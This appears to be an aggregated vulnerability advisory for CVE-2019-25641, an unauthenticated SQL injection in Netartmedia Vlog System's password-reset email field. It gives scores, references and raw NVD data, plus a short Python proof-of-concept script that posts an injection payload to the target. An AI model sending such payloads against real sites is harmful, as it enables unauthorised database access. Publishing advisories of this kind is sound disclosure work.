CVE-2019-25641

Description

Netartmedia Vlog System contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with malicious email values in the forgotten_password module to extract sensitive database information.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Netartmedia Vlog System (最新版本及之前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable Vlog System instance
target_url = "http://target-host/index.php"

# The vulnerable module is 'forgotten_password' and the parameter is 'email'
payload_data = {
    "module": "forgotten_password",
    "email": "' OR '1'='1" # Simple SQL Injection payload to test vulnerability
}

try:
    # Sending a POST request to inject SQL code
    response = requests.post(target_url, data=payload_data)

    # Check if the response indicates successful injection or database error
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
    else:
        print(f"[-] Unexpected status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25641
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25641
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25641/
[4] VulDB https://vuldb.com/cve/CVE-2019-25641
[5] https://www.exploit-db.com/exploits/46583
[6] https://www.netartmedia.net/vlogsystem/
[7] https://www.vulncheck.com/advisories/netartmedia-vlog-system-lastest-sql-injection-via-email-parameter

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25641", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:06.270", "lastModified": "2026-04-15T15:00:32.790", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netartmedia Vlog System contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the email parameter. Attackers can send POST requests to index.php with malicious email values in the forgotten_password module to extract sensitive database information."}, {"lang": "es", "value": "Netartmedia Vlog System contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados manipular consultas de base de datos inyectando código SQL a través del parámetro de correo electrónico. Los atacantes pueden enviar solicitudes POST a index.php con valores de correo electrónico maliciosos en el módulo forgotten_password para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46583", "source": "[email protected]"}, {"url": "https://www.netartmedia.net/vlogsystem/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/netartmedia-vlog-system-lastest-sql-injection-via-email-parameter", "source": "[email protected]"}]}}